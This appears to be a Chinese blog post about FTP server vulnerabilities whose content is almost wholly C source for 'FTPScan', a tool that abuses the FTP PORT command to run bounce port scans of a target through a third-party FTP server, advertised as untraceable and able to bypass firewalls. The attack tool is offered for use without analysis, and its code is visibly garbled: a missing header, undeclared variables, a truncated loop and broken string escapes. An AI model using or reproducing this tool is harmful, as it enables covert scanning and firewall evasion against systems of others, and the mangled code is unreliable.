ftp服务器文件有漏洞,扫描FTP服务器漏洞

最新推荐文章于 2024-05-10 22:24:53 发布

小荧

最新推荐文章于 2024-05-10 22:24:53 发布

阅读量510

点赞数

文章标签： ftp服务器文件有漏洞

/** FTPScan

** Exploits bug in FTP protocol that allows user to connect to arbritary

* IP address and port.

** Features: Untraceable port scans. Bypass firewalls!

* Example usage:

* ftp-scan ftp.cdrom.com 127.0.0.1 0 1024

** This will scan IP 127.0.0.1 from ftp.cdrom.com from port 0 to 1024

#include

int sock;

char line[1024];

void rconnect(char *server)

{

struct sockaddr_in sin;

struct hostent *hp;

hp = gethostbyname(server);

if (hp==NULL) {

printf("Unknown host: %sn",server);

exit(0);

}

bzero((char*) &sin, sizeof(sin));

bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

sin.sin_family = hp->h_addrtype;

sin.sin_port = htons(21);

sock = socket(AF_INET, SOCK_STREAM, 0);

connect(sock,(struct sockaddr *) &sin, sizeof(sin));

}

void login(void)

{

char buf[1024];

sprintf(buf,"USER ftpn");

send(sock, buf, strlen(buf),0);

sleep(1);

sprintf(buf,"PASS user@n");

send(sock, buf, strlen(buf),0);

}

void readln(void)

{

int i,done=0,w;

char tmp[1];

sprintf(line,"");

i = 0;

while (!done) {

w=read(sock,tmp, 1, 0);

if (tmp[0] != 0) {

line[i] = tmp[0];

}

if (line[i] == ) {

done = 1;

}

i++;

}

line[i] = 0;

}

void sendln(char s[1024]) {

send(sock, s, strlen(s),0);

}

#define UC(b) (((int)b)&0xff)

void main(int argc, char **argv)

{

char buf[1024];

int i;

u_short sport,eport;

struct hostent *hp;

struct sockaddr_in sin;

char adr[1024];

if (argc != 5) {

printf("usage: ftp-scan ftp_server scan_host loport hiportn");

exit(-1);

}

hp = gethostbyname(argv[2]);

if (hp==NULL) {

printf("Unknown host: %sn",argv[2]);

exit(0);

}

bzero((char*) &sin, sizeof(sin));

bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

rconnect(argv[1]);

/* Login anon to server */

/* Make sure we are in */

for (i=0; i<200; i++) {

readln();

if (strstr(line,"230 Guest")) {

printf("%s",line);

i = 200;

}

a=(char *)&sin.sin_addr;

sport = atoi(argv[3]);

eport = atoi(argv[4]);

sprintf(adr,"%i,%i,%i,%i",UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]));

for (i=sport; i

sin.sin_port = htons(i);

p=(char *)&sin.sin_port;

sprintf(buf,"nPORT %s,%i,%inLISTn",adr,UC(p[0]),UC(p[1]));

sendln(buf);

sprintf(line,"");

while (!strstr(line, "150") &&!strstr(line,"425")) {

readln();

}

if (strstr(line,"150")) {

printf("%i connected.n",i);

}

close(sock);

}

小荧

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ftp服务器文件有漏洞,扫描FTP服务器漏洞

/** FTPScan** Exploits bug in FTP protocol that allows user to connect to arbritary* IP address and port.** Features: Untraceable port scans. Bypass firewalls!* Example usage:* ftp-scan ftp.cdrom.com ...
复制链接

扫一扫